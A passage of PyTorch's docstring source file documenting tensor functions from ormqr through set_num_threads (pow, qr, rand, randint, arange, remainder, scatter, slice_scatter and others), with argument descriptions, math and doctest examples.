If :attr:`transpose` is `True` then `op` is the conjugate transpose operation, otherwise it's a no-op.
Supports inputs of float, double, cfloat and cdouble dtypes.
Also supports batched inputs, and, if the input is batched, the output is batched with the same dimensions.
.. seealso::
:func:`torch.geqrf` can be used to form the Householder representation `(input, tau)` of matrix `Q`
from the QR decomposition.
Args:
input (Tensor): tensor of shape `(*, mn, k)` where `*` is zero or more batch dimensions
and `mn` equals `m` or `n` depending on :attr:`left`.
tau (Tensor): tensor of shape `(*, min(mn, k))` where `*` is zero or more batch dimensions.
other (Tensor): tensor of shape `(*, m, n)` where `*` is zero or more batch dimensions.
left (bool): controls the order of multiplication.
transpose (bool): controls whether the matrix `Q` is conjugate transposed or not.
Keyword args:
out (Tensor, optional): the output Tensor. Ignored if `None`. Default: `None`.
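Example (a small illustrative sketch that reconstructs `A` from the Householder
representation returned by :func:`torch.geqrf`; the shape is chosen only for illustration)::
>>> A = torch.randn(3, 3)
>>> h, tau = torch.geqrf(A)
>>> R = torch.triu(h)  # upper-triangular factor stored in h
>>> torch.allclose(torch.ormqr(h, tau, R), A)  # Q @ R reconstructs A
True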
.. _Representation of Orthogonal or Unitary Matrices:
https://www.netlib.org/lapack/lug/node128.html
""")
add_docstr(torch.permute,
r"""
permute(input, dims) -> Tensor
Returns a view of the original tensor :attr:`input` with its dimensions permuted.
Args:
{input}
dims (tuple of ints): The desired ordering of dimensions
Example:
>>> x = torch.randn(2, 3, 5)
>>> x.size()
torch.Size([2, 3, 5])
>>> torch.permute(x, (2, 0, 1)).size()
torch.Size([5, 2, 3])
""".format(**common_args))
add_docstr(torch.poisson,
r"""
poisson(input, generator=None) -> Tensor
Returns a tensor of the same size as :attr:`input` with each element
sampled from a Poisson distribution with rate parameter given by the corresponding
element in :attr:`input` i.e.,
.. math::
\text{{out}}_i \sim \text{{Poisson}}(\text{{input}}_i)
Args:
input (Tensor): the input tensor containing the rates of the Poisson distribution
Keyword args:
{generator}
Example::
>>> rates = torch.rand(4, 4) * 5 # rate parameter between 0 and 5
>>> torch.poisson(rates)
tensor([[9., 1., 3., 5.],
[8., 6., 6., 0.],
[0., 4., 5., 3.],
[2., 1., 4., 2.]])
""".format(**common_args))
add_docstr(torch.polygamma,
r"""
polygamma(n, input, *, out=None) -> Tensor
Alias for :func:`torch.special.polygamma`.
""")
add_docstr(torch.positive,
r"""
positive(input) -> Tensor
Returns :attr:`input`.
Throws a runtime error if :attr:`input` is a bool tensor.
""" + r"""
Args:
{input}
Example::
>>> t = torch.randn(5)
>>> t
tensor([ 0.0090, -0.2262, -0.0682, -0.2866, 0.3940])
>>> torch.positive(t)
tensor([ 0.0090, -0.2262, -0.0682, -0.2866, 0.3940])
""".format(**common_args))
add_docstr(torch.pow,
r"""
pow(input, exponent, *, out=None) -> Tensor
Takes the power of each element in :attr:`input` with :attr:`exponent` and
returns a tensor with the result.
:attr:`exponent` can be either a single ``float`` number or a `Tensor`
with the same number of elements as :attr:`input`.
When :attr:`exponent` is a scalar value, the operation applied is:
.. math::
\text{out}_i = x_i ^ \text{exponent}
When :attr:`exponent` is a tensor, the operation applied is:
.. math::
\text{out}_i = x_i ^ {\text{exponent}_i}
""" + r"""
When :attr:`exponent` is a tensor, the shapes of :attr:`input`
and :attr:`exponent` must be :ref:`broadcastable <broadcasting-semantics>`.
Args:
{input}
exponent (float or tensor): the exponent value
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.4331, 1.2475, 0.6834, -0.2791])
>>> torch.pow(a, 2)
tensor([ 0.1875, 1.5561, 0.4670, 0.0779])
>>> exp = torch.arange(1., 5.)
>>> a = torch.arange(1., 5.)
>>> a
tensor([ 1., 2., 3., 4.])
>>> exp
tensor([ 1., 2., 3., 4.])
>>> torch.pow(a, exp)
tensor([ 1., 4., 27., 256.])
.. function:: pow(self, exponent, *, out=None) -> Tensor
:noindex:
:attr:`self` is a scalar ``float`` value, and :attr:`exponent` is a tensor.
The returned tensor :attr:`out` is of the same shape as :attr:`exponent`
The operation applied is:
.. math::
\text{{out}}_i = \text{{self}} ^ {{\text{{exponent}}_i}}
Args:
self (float): the scalar base value for the power operation
exponent (Tensor): the exponent tensor
Keyword args:
{out}
Example::
>>> exp = torch.arange(1., 5.)
>>> base = 2
>>> torch.pow(base, exp)
tensor([ 2., 4., 8., 16.])
""".format(**common_args))
add_docstr(torch.float_power,
r"""
float_power(input, exponent, *, out=None) -> Tensor
Raises :attr:`input` to the power of :attr:`exponent`, elementwise, in double precision.
If neither input is complex returns a ``torch.float64`` tensor,
and if one or more inputs is complex returns a ``torch.complex128`` tensor.
.. note::
This function always computes in double precision, unlike :func:`torch.pow`,
which implements more typical :ref:`type promotion <type-promotion-doc>`.
This is useful when the computation needs to be performed in a wider or more precise dtype,
or the results of the computation may contain fractional values not representable in the input dtypes,
like when an integer base is raised to a negative integer exponent.
Args:
input (Tensor or Number): the base value(s)
exponent (Tensor or Number): the exponent value(s)
Keyword args:
{out}
Example::
>>> a = torch.randint(10, (4,))
>>> a
tensor([6, 4, 7, 1])
>>> torch.float_power(a, 2)
tensor([36., 16., 49., 1.], dtype=torch.float64)
>>> a = torch.arange(1, 5)
>>> a
tensor([ 1, 2, 3, 4])
>>> exp = torch.tensor([2, -3, 4, -5])
>>> exp
tensor([ 2, -3, 4, -5])
>>> torch.float_power(a, exp)
tensor([1.0000e+00, 1.2500e-01, 8.1000e+01, 9.7656e-04], dtype=torch.float64)
""".format(**common_args))
add_docstr(torch.prod,
r"""
prod(input, *, dtype=None) -> Tensor
Returns the product of all elements in the :attr:`input` tensor.
Args:
{input}
Keyword args:
{dtype}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[-0.8020, 0.5428, -1.5854]])
>>> torch.prod(a)
tensor(0.6902)
.. function:: prod(input, dim, keepdim=False, *, dtype=None) -> Tensor
:noindex:
Returns the product of each row of the :attr:`input` tensor in the given
dimension :attr:`dim`.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{dtype}
Example::
>>> a = torch.randn(4, 2)
>>> a
tensor([[ 0.5261, -0.3837],
[ 1.1857, -0.2498],
[-1.1646, 0.0705],
[ 1.1131, -1.0629]])
>>> torch.prod(a, 1)
tensor([-0.2018, -0.2962, -0.0821, -1.1831])
""".format(**single_dim_common))
add_docstr(torch.promote_types,
r"""
promote_types(type1, type2) -> dtype
Returns the :class:`torch.dtype` with the smallest size and scalar kind that is
not smaller nor of lower kind than either `type1` or `type2`. See type promotion
:ref:`documentation <type-promotion-doc>` for more information on the type
promotion logic.
Args:
type1 (:class:`torch.dtype`)
type2 (:class:`torch.dtype`)
Example::
>>> torch.promote_types(torch.int32, torch.float32)
torch.float32
>>> torch.promote_types(torch.uint8, torch.long)
torch.long
""")
add_docstr(torch.qr,
r"""
qr(input, some=True, *, out=None) -> (Tensor, Tensor)
Computes the QR decomposition of a matrix or a batch of matrices :attr:`input`,
and returns a namedtuple (Q, R) of tensors such that :math:`\text{input} = Q R`
with :math:`Q` being an orthogonal matrix or batch of orthogonal matrices and
:math:`R` being an upper triangular matrix or batch of upper triangular matrices.
If :attr:`some` is ``True``, then this function returns the thin (reduced) QR factorization.
Otherwise, if :attr:`some` is ``False``, this function returns the complete QR factorization.
.. warning::
:func:`torch.qr` is deprecated in favor of :func:`torch.linalg.qr`
and will be removed in a future PyTorch release. The boolean parameter :attr:`some` has been
replaced with a string parameter :attr:`mode`.
``Q, R = torch.qr(A)`` should be replaced with
.. code:: python
Q, R = torch.linalg.qr(A)
``Q, R = torch.qr(A, some=False)`` should be replaced with
.. code:: python
Q, R = torch.linalg.qr(A, mode="complete")
.. warning::
If you plan to backpropagate through QR, note that the current backward implementation
is only well-defined when the first :math:`\min(input.size(-1), input.size(-2))`
columns of :attr:`input` are linearly independent.
This behavior will probably change once QR supports pivoting.
.. note:: This function uses LAPACK for CPU inputs and MAGMA for CUDA inputs,
and may produce different (valid) decompositions on different device types
or different platforms.
Args:
input (Tensor): the input tensor of size :math:`(*, m, n)` where `*` is zero or more
batch dimensions consisting of matrices of dimension :math:`m \times n`.
some (bool, optional): Set to ``True`` for reduced QR decomposition and ``False`` for
complete QR decomposition. If `k = min(m, n)` then:
* ``some=True``: returns `(Q, R)` with dimensions (m, k), (k, n) (default)
* ``some=False``: returns `(Q, R)` with dimensions (m, m), (m, n)
Keyword args:
out (tuple, optional): tuple of `Q` and `R` tensors.
The dimensions of `Q` and `R` are detailed in the description of :attr:`some` above.
Example::
>>> a = torch.tensor([[12., -51, 4], [6, 167, -68], [-4, 24, -41]])
>>> q, r = torch.qr(a)
>>> q
tensor([[-0.8571, 0.3943, 0.3314],
[-0.4286, -0.9029, -0.0343],
[ 0.2857, -0.1714, 0.9429]])
>>> r
tensor([[ -14.0000, -21.0000, 14.0000],
[ 0.0000, -175.0000, 70.0000],
[ 0.0000, 0.0000, -35.0000]])
>>> torch.mm(q, r).round()
tensor([[ 12., -51., 4.],
[ 6., 167., -68.],
[ -4., 24., -41.]])
>>> torch.mm(q.t(), q).round()
tensor([[ 1., 0., 0.],
[ 0., 1., -0.],
[ 0., -0., 1.]])
>>> a = torch.randn(3, 4, 5)
>>> q, r = torch.qr(a, some=False)
>>> torch.allclose(torch.matmul(q, r), a)
True
>>> torch.allclose(torch.matmul(q.mT, q), torch.eye(4))
True
""")
add_docstr(torch.rad2deg,
r"""
rad2deg(input, *, out=None) -> Tensor
Returns a new tensor with each of the elements of :attr:`input`
converted from angles in radians to degrees.
Args:
{input}
Keyword arguments:
{out}
Example::
>>> a = torch.tensor([[3.142, -3.142], [6.283, -6.283], [1.570, -1.570]])
>>> torch.rad2deg(a)
tensor([[ 180.0233, -180.0233],
[ 359.9894, -359.9894],
[ 89.9544, -89.9544]])
""".format(**common_args))
add_docstr(torch.deg2rad,
r"""
deg2rad(input, *, out=None) -> Tensor
Returns a new tensor with each of the elements of :attr:`input`
converted from angles in degrees to radians.
Args:
{input}
Keyword arguments:
{out}
Example::
>>> a = torch.tensor([[180.0, -180.0], [360.0, -360.0], [90.0, -90.0]])
>>> torch.deg2rad(a)
tensor([[ 3.1416, -3.1416],
[ 6.2832, -6.2832],
[ 1.5708, -1.5708]])
""".format(**common_args))
add_docstr(torch.heaviside,
r"""
heaviside(input, values, *, out=None) -> Tensor
Computes the Heaviside step function for each element in :attr:`input`.
The Heaviside step function is defined as:
.. math::
\text{heaviside}(input, values) = \begin{cases}
0, & \text{if input < 0}\\
values, & \text{if input == 0}\\
1, & \text{if input > 0}
\end{cases}
""" + r"""
Args:
{input}
values (Tensor): The values to use where :attr:`input` is zero.
Keyword arguments:
{out}
Example::
>>> input = torch.tensor([-1.5, 0, 2.0])
>>> values = torch.tensor([0.5])
>>> torch.heaviside(input, values)
tensor([0.0000, 0.5000, 1.0000])
>>> values = torch.tensor([1.2, -2.0, 3.5])
>>> torch.heaviside(input, values)
tensor([0., -2., 1.])
""".format(**common_args))
add_docstr(torch.rand,
r"""
rand(*size, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a tensor filled with random numbers from a uniform distribution
on the interval :math:`[0, 1)`
The shape of the tensor is defined by the variable argument :attr:`size`.
Args:
size (int...): a sequence of integers defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple.
Keyword args:
{generator}
{out}
{dtype}
{layout}
{device}
{requires_grad}
Example::
>>> torch.rand(4)
tensor([ 0.5204, 0.2503, 0.3525, 0.5673])
>>> torch.rand(2, 3)
tensor([[ 0.8237, 0.5781, 0.6879],
[ 0.3816, 0.7249, 0.0998]])
""".format(**factory_common_args))
add_docstr(torch.rand_like,
r"""
rand_like(input, *, dtype=None, layout=None, device=None, requires_grad=False, memory_format=torch.preserve_format) -> Tensor
Returns a tensor with the same size as :attr:`input` that is filled with
random numbers from a uniform distribution on the interval :math:`[0, 1)`.
``torch.rand_like(input)`` is equivalent to
``torch.rand(input.size(), dtype=input.dtype, layout=input.layout, device=input.device)``.
Args:
{input}
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
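Example (an illustrative sketch; the random values themselves vary, so only the
inherited size and dtype are shown)::
>>> x = torch.empty(2, 3, dtype=torch.float64)
>>> torch.rand_like(x).shape
torch.Size([2, 3])
>>> torch.rand_like(x).dtype
torch.float64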
""".format(**factory_like_common_args))
add_docstr(torch.randint,
"""
randint(low=0, high, size, \\*, generator=None, out=None, \
dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a tensor filled with random integers generated uniformly
between :attr:`low` (inclusive) and :attr:`high` (exclusive).
The shape of the tensor is defined by the variable argument :attr:`size`.
.. note::
With the global dtype default (``torch.float32``), this function returns
a tensor with dtype ``torch.int64``.
Args:
low (int, optional): Lowest integer to be drawn from the distribution. Default: 0.
high (int): One above the highest integer to be drawn from the distribution.
size (tuple): a tuple defining the shape of the output tensor.
Keyword args:
{generator}
{out}
dtype (`torch.dtype`, optional): the desired data type of returned tensor. Default: if ``None``,
this function returns a tensor with dtype ``torch.int64``.
{layout}
{device}
{requires_grad}
Example::
>>> torch.randint(3, 5, (3,))
tensor([4, 3, 4])
>>> torch.randint(10, (2, 2))
tensor([[0, 2],
[5, 5]])
>>> torch.randint(3, 10, (2, 2))
tensor([[4, 5],
[6, 7]])
""".format(**factory_common_args))
add_docstr(torch.randint_like,
"""
randint_like(input, low=0, high, \\*, dtype=None, layout=torch.strided, device=None, requires_grad=False, \
memory_format=torch.preserve_format) -> Tensor
Returns a tensor with the same shape as Tensor :attr:`input` filled with
random integers generated uniformly between :attr:`low` (inclusive) and
:attr:`high` (exclusive).
.. note::
With the global dtype default (``torch.float32``), this function returns
a tensor with dtype ``torch.int64``.
Args:
{input}
low (int, optional): Lowest integer to be drawn from the distribution. Default: 0.
high (int): One above the highest integer to be drawn from the distribution.
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
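Example (an illustrative sketch; the random values themselves vary, so only the
inherited size and dtype are shown)::
>>> x = torch.empty(2, 2, dtype=torch.int64)
>>> torch.randint_like(x, 10).shape
torch.Size([2, 2])
>>> torch.randint_like(x, 10).dtype
torch.int64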
""".format(**factory_like_common_args))
add_docstr(torch.randn,
r"""
randn(*size, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a tensor filled with random numbers from a normal distribution
with mean `0` and variance `1` (also called the standard normal
distribution).
.. math::
\text{{out}}_{{i}} \sim \mathcal{{N}}(0, 1)
The shape of the tensor is defined by the variable argument :attr:`size`.
Args:
size (int...): a sequence of integers defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple.
Keyword args:
{generator}
{out}
{dtype}
{layout}
{device}
{requires_grad}
Example::
>>> torch.randn(4)
tensor([-2.1436, 0.9966, 2.3426, -0.6366])
>>> torch.randn(2, 3)
tensor([[ 1.5954, 2.8929, -1.0923],
[ 1.1719, -0.4709, -0.1996]])
""".format(**factory_common_args))
add_docstr(torch.randn_like,
r"""
randn_like(input, *, dtype=None, layout=None, device=None, requires_grad=False, memory_format=torch.preserve_format) -> Tensor
Returns a tensor with the same size as :attr:`input` that is filled with
random numbers from a normal distribution with mean 0 and variance 1.
``torch.randn_like(input)`` is equivalent to
``torch.randn(input.size(), dtype=input.dtype, layout=input.layout, device=input.device)``.
Args:
{input}
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
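Example (an illustrative sketch; only the inherited size is shown since the
random values vary)::
>>> x = torch.empty(2, 3)
>>> torch.randn_like(x).shape
torch.Size([2, 3])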
""".format(**factory_like_common_args))
add_docstr(torch.randperm,
"""
randperm(n, *, generator=None, out=None, dtype=torch.int64, layout=torch.strided, \
device=None, requires_grad=False, pin_memory=False) -> Tensor
""" + r"""
Returns a random permutation of integers from ``0`` to ``n - 1``.
Args:
n (int): the upper bound (exclusive)
Keyword args:
{generator}
{out}
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: ``torch.int64``.
{layout}
{device}
{requires_grad}
{pin_memory}
Example::
>>> torch.randperm(4)
tensor([2, 1, 0, 3])
""".format(**factory_common_args))
add_docstr(torch.tensor,
r"""
tensor(data, *, dtype=None, device=None, requires_grad=False, pin_memory=False) -> Tensor
Constructs a tensor with no autograd history (also known as a "leaf tensor", see :doc:`/notes/autograd`) by copying :attr:`data`.
.. warning::
When working with tensors prefer using :func:`torch.Tensor.clone`,
:func:`torch.Tensor.detach`, and :func:`torch.Tensor.requires_grad_` for
readability. Letting `t` be a tensor, ``torch.tensor(t)`` is equivalent to
``t.clone().detach()``, and ``torch.tensor(t, requires_grad=True)``
is equivalent to ``t.clone().detach().requires_grad_(True)``.
.. seealso::
:func:`torch.as_tensor` preserves autograd history and avoids copies where possible.
:func:`torch.from_numpy` creates a tensor that shares storage with a NumPy array.
Args:
{data}
Keyword args:
{dtype}
device (:class:`torch.device`, optional): the device of the constructed tensor. If None and data is a tensor
then the device of data is used. If None and data is not a tensor then
the result tensor is constructed on the CPU.
{requires_grad}
{pin_memory}
Example::
>>> torch.tensor([[0.1, 1.2], [2.2, 3.1], [4.9, 5.2]])
tensor([[ 0.1000, 1.2000],
[ 2.2000, 3.1000],
[ 4.9000, 5.2000]])
>>> torch.tensor([0, 1]) # Type inference on data
tensor([ 0, 1])
>>> torch.tensor([[0.11111, 0.222222, 0.3333333]],
... dtype=torch.float64,
... device=torch.device('cuda:0')) # creates a double tensor on a CUDA device
tensor([[ 0.1111, 0.2222, 0.3333]], dtype=torch.float64, device='cuda:0')
>>> torch.tensor(3.14159) # Create a zero-dimensional (scalar) tensor
tensor(3.1416)
>>> torch.tensor([]) # Create an empty tensor (of size (0,))
tensor([])
""".format(**factory_data_common_args))
add_docstr(torch.range,
r"""
range(start=0, end, step=1, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a 1-D tensor of size :math:`\left\lfloor \frac{\text{end} - \text{start}}{\text{step}} \right\rfloor + 1`
with values from :attr:`start` to :attr:`end` with step :attr:`step`. Step is
the gap between two values in the tensor.
.. math::
\text{out}_{i+1} = \text{out}_i + \text{step}.
""" + r"""
.. warning::
This function is deprecated and will be removed in a future release because its behavior is inconsistent with
Python's range builtin. Instead, use :func:`torch.arange`, which produces values in [start, end).
Args:
start (float): the starting value for the set of points. Default: ``0``.
end (float): the ending value for the set of points
step (float): the gap between each pair of adjacent points. Default: ``1``.
Keyword args:
{out}
{dtype} If `dtype` is not given, infer the data type from the other input
arguments. If any of `start`, `end`, or `step` are floating-point, the
`dtype` is inferred to be the default dtype, see
:meth:`~torch.get_default_dtype`. Otherwise, the `dtype` is inferred to
be `torch.int64`.
{layout}
{device}
{requires_grad}
Example::
>>> torch.range(1, 4)
tensor([ 1., 2., 3., 4.])
>>> torch.range(1, 4, 0.5)
tensor([ 1.0000, 1.5000, 2.0000, 2.5000, 3.0000, 3.5000, 4.0000])
""".format(**factory_common_args))
add_docstr(torch.arange,
r"""
arange(start=0, end, step=1, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a 1-D tensor of size :math:`\left\lceil \frac{\text{end} - \text{start}}{\text{step}} \right\rceil`
with values from the interval ``[start, end)`` taken with common difference
:attr:`step` beginning from `start`.
Note that non-integer :attr:`step` is subject to floating point rounding errors when
comparing against :attr:`end`; to avoid inconsistency, we advise adding a small epsilon to :attr:`end`
in such cases.
.. math::
\text{out}_{{i+1}} = \text{out}_{i} + \text{step}
""" + r"""
Args:
start (Number): the starting value for the set of points. Default: ``0``.
end (Number): the ending value for the set of points
step (Number): the gap between each pair of adjacent points. Default: ``1``.
Keyword args:
{out}
{dtype} If `dtype` is not given, infer the data type from the other input
arguments. If any of `start`, `end`, or `step` are floating-point, the
`dtype` is inferred to be the default dtype, see
:meth:`~torch.get_default_dtype`. Otherwise, the `dtype` is inferred to
be `torch.int64`.
{layout}
{device}
{requires_grad}
Example::
>>> torch.arange(5)
tensor([ 0, 1, 2, 3, 4])
>>> torch.arange(1, 4)
tensor([ 1, 2, 3])
>>> torch.arange(1, 2.5, 0.5)
tensor([ 1.0000, 1.5000, 2.0000])
""".format(**factory_common_args))
add_docstr(torch.ravel,
r"""
ravel(input) -> Tensor
Return a contiguous flattened tensor. A copy is made only if needed.
Args:
{input}
Example::
>>> t = torch.tensor([[[1, 2],
... [3, 4]],
... [[5, 6],
... [7, 8]]])
>>> torch.ravel(t)
tensor([1, 2, 3, 4, 5, 6, 7, 8])
""".format(**common_args))
add_docstr(torch.remainder,
r"""
remainder(input, other, *, out=None) -> Tensor
Like :func:`torch.fmod` this applies C++'s `std::fmod <https://en.cppreference.com/w/cpp/numeric/math/fmod>`_
for floating point tensors and the modulus operation for integer tensors.
Unlike :func:`torch.fmod`, however, if the sign of the modulus is different
than the sign of the divisor :attr:`other` then the divisor is added to the modulus.
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer and float inputs.
.. note::
Complex inputs are not supported. In some cases, it is not mathematically
possible to satisfy the definition of a modulo operation with complex numbers.
See :func:`torch.fmod` for how division by zero is handled.
.. note::
This op, like NumPy's `remainder <https://numpy.org/doc/stable/reference/generated/numpy.remainder.html>`_,
is equivalent to Python's modulus operation, and different from Python's
`math.remainder <https://docs.python.org/dev/library/math.html#math.remainder>`_ and
C++'s `std::remainder <https://en.cppreference.com/w/cpp/numeric/math/remainder>`_ which implement
the IEEE remainder.
Args:
input (Tensor or Scalar): the dividend
other (Tensor or Scalar): the divisor
Keyword args:
{out}
Example::
>>> torch.remainder(torch.tensor([-3., -2, -1, 1, 2, 3]), 2)
tensor([ 1., 0., 1., 1., 0., 1.])
>>> torch.remainder(torch.tensor([1, 2, 3, 4, 5]), -1.5)
tensor([ -0.5000, -1.0000, 0.0000, -0.5000, -1.0000 ])
.. seealso::
:func:`torch.fmod` which just computes the modulus for integer inputs and
applies C++'s `std::fmod <https://en.cppreference.com/w/cpp/numeric/math/fmod>`_
for floating point inputs.
""".format(**common_args))
add_docstr(torch.renorm,
r"""
renorm(input, p, dim, maxnorm, *, out=None) -> Tensor
Returns a tensor where each sub-tensor of :attr:`input` along dimension
:attr:`dim` is normalized such that the `p`-norm of the sub-tensor is lower
than the value :attr:`maxnorm`
.. note:: If the norm of a row is lower than `maxnorm`, the row is unchanged
Args:
{input}
p (float): the power for the norm computation
dim (int): the dimension to slice over to get the sub-tensors
maxnorm (float): the maximum norm to keep each sub-tensor under
Keyword args:
{out}
Example::
>>> x = torch.ones(3, 3)
>>> x[1].fill_(2)
tensor([ 2., 2., 2.])
>>> x[2].fill_(3)
tensor([ 3., 3., 3.])
>>> x
tensor([[ 1., 1., 1.],
[ 2., 2., 2.],
[ 3., 3., 3.]])
>>> torch.renorm(x, 1, 0, 5)
tensor([[ 1.0000, 1.0000, 1.0000],
[ 1.6667, 1.6667, 1.6667],
[ 1.6667, 1.6667, 1.6667]])
""".format(**common_args))
add_docstr(torch.reshape,
r"""
reshape(input, shape) -> Tensor
Returns a tensor with the same data and number of elements as :attr:`input`,
but with the specified shape. When possible, the returned tensor will be a view
of :attr:`input`. Otherwise, it will be a copy. Contiguous inputs and inputs
with compatible strides can be reshaped without copying, but you should not
depend on the copying vs. viewing behavior.
See :meth:`torch.Tensor.view` on when it is possible to return a view.
A single dimension may be -1, in which case it's inferred from the remaining
dimensions and the number of elements in :attr:`input`.
Args:
input (Tensor): the tensor to be reshaped
shape (tuple of ints): the new shape
Example::
>>> a = torch.arange(4.)
>>> torch.reshape(a, (2, 2))
tensor([[ 0., 1.],
[ 2., 3.]])
>>> b = torch.tensor([[0, 1], [2, 3]])
>>> torch.reshape(b, (-1,))
tensor([ 0, 1, 2, 3])
""")
add_docstr(torch.result_type,
r"""
result_type(tensor1, tensor2) -> dtype
Returns the :class:`torch.dtype` that would result from performing an arithmetic
operation on the provided input tensors. See type promotion :ref:`documentation <type-promotion-doc>`
for more information on the type promotion logic.
Args:
tensor1 (Tensor or Number): an input tensor or number
tensor2 (Tensor or Number): an input tensor or number
Example::
>>> torch.result_type(torch.tensor([1, 2], dtype=torch.int), 1.0)
torch.float32
>>> torch.result_type(torch.tensor([1, 2], dtype=torch.uint8), torch.tensor(1))
torch.uint8
""")
add_docstr(torch.row_stack,
r"""
row_stack(tensors, *, out=None) -> Tensor
Alias of :func:`torch.vstack`.
""")
add_docstr(torch.round,
r"""
round(input, *, out=None) -> Tensor
Returns a new tensor with each of the elements of :attr:`input` rounded
to the closest integer.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.9920, 0.6077, 0.9734, -1.0362])
>>> torch.round(a)
tensor([ 1., 1., 1., -1.])
""".format(**common_args))
add_docstr(torch.rsqrt,
r"""
rsqrt(input, *, out=None) -> Tensor
Returns a new tensor with the reciprocal of the square-root of each of
the elements of :attr:`input`.
.. math::
\text{out}_{i} = \frac{1}{\sqrt{\text{input}_{i}}}
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.0370, 0.2970, 1.5420, -0.9105])
>>> torch.rsqrt(a)
tensor([ nan, 1.8351, 0.8053, nan])
""".format(**common_args))
add_docstr(torch.scatter,
r"""
scatter(input, dim, index, src) -> Tensor
Out-of-place version of :meth:`torch.Tensor.scatter_`
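Example (a minimal sketch; see :meth:`torch.Tensor.scatter_` for the full semantics,
the shapes below are chosen only for illustration)::
>>> src = torch.tensor([[1., 2., 3.]])
>>> index = torch.tensor([[0, 1, 2]])
>>> torch.scatter(torch.zeros(3, 3), 0, index, src)
tensor([[1., 0., 0.],
[0., 2., 0.],
[0., 0., 3.]])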
""")
add_docstr(torch.scatter_add,
r"""
scatter_add(input, dim, index, src) -> Tensor
Out-of-place version of :meth:`torch.Tensor.scatter_add_`
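Example (a minimal sketch showing how duplicate indices accumulate; the shapes are
chosen only for illustration)::
>>> src = torch.ones(2, 3)
>>> index = torch.zeros(2, 3, dtype=torch.int64)
>>> torch.scatter_add(torch.zeros(3, 3), 0, index, src)
tensor([[2., 2., 2.],
[0., 0., 0.],
[0., 0., 0.]])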
""")
add_docstr(torch.select,
r"""
select(input, dim, index) -> Tensor
Slices the :attr:`input` tensor along the selected dimension at the given index.
This function returns a view of the original tensor with the given dimension removed.
Args:
{input}
dim (int): the dimension to slice
index (int): the index to select with
.. note::
:meth:`select` is equivalent to slicing. For example,
``tensor.select(0, index)`` is equivalent to ``tensor[index]`` and
``tensor.select(2, index)`` is equivalent to ``tensor[:,:,index]``.
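A minimal sketch of the slicing equivalence noted above::
>>> x = torch.arange(6).reshape(2, 3)
>>> torch.select(x, 0, 1)
tensor([3, 4, 5])
>>> torch.equal(torch.select(x, 0, 1), x[1])
True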
""")
add_docstr(torch.select_scatter,
r"""
select_scatter(input, src, dim, index) -> Tensor
Embeds the values of the :attr:`src` tensor into :attr:`input` at the given index.
This function returns a tensor with fresh storage; it does not create a view.
Args:
{input}
src (Tensor): The tensor to embed into :attr:`input`
dim (int): the dimension to insert the slice into.
index (int): the index to select with
.. note::
:attr:`src` must be of the proper size in order to be embedded
into :attr:`input`. Specifically, it should have the same shape as
``torch.select(input, dim, index)``
Example::
>>> a = torch.zeros(2, 2)
>>> b = torch.ones(2)
>>> a.select_scatter(b, 0, 0)
tensor([[1., 1.],
[0., 0.]])
""")
add_docstr(torch.slice_scatter,
r"""
slice_scatter(input, src, dim=0, start=None, end=None, step=1) -> Tensor
Embeds the values of the :attr:`src` tensor into :attr:`input` at the given
dimension.
This function returns a tensor with fresh storage; it does not create a view.
Args:
{input}
src (Tensor): The tensor to embed into :attr:`input`
dim (int): the dimension to insert the slice into
start (Optional[int]): the start index of where to insert the slice
end (Optional[int]): the end index of where to insert the slice
step (int): how many elements to skip in between
Example::
>>> a = torch.zeros(8, 8)
>>> b = torch.ones(8)
>>> a.slice_scatter(b, start=6)
tensor([[0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 1., 1., 1., 1.],
[1., 1., 1., 1., 1., 1., 1., 1.]])
>>> b = torch.ones(2)
>>> a.slice_scatter(b, dim=1, start=2, end=6, step=2)
tensor([[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.]])
""")
add_docstr(torch.set_flush_denormal,
r"""
set_flush_denormal(mode) -> bool
Controls whether denormal floating-point numbers are flushed to zero on CPU.
Returns ``True`` if your system supports flushing denormal numbers and it
successfully configures flush denormal mode. :meth:`~torch.set_flush_denormal`
is only supported on x86 architectures supporting SSE3.
Args:
mode (bool): Controls whether to enable flush denormal mode or not
Example::
>>> torch.set_flush_denormal(True)
True
>>> torch.tensor([1e-323], dtype=torch.float64)
tensor([ 0.], dtype=torch.float64)
>>> torch.set_flush_denormal(False)
True
>>> torch.tensor([1e-323], dtype=torch.float64)
tensor(9.88131e-324 *
[ 1.0000], dtype=torch.float64)
""")
add_docstr(torch.set_num_threads, r"""
set_num_threads(int)
Sets the number of threads used for intraop parallelism on CPU.
.. warning::
To ensure that the correct number of threads is used, set_num_threads
must be called before running eager, JIT or autograd code.
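Example (an illustrative sketch; the thread count is a process-wide setting)::
>>> torch.set_num_threads(4)
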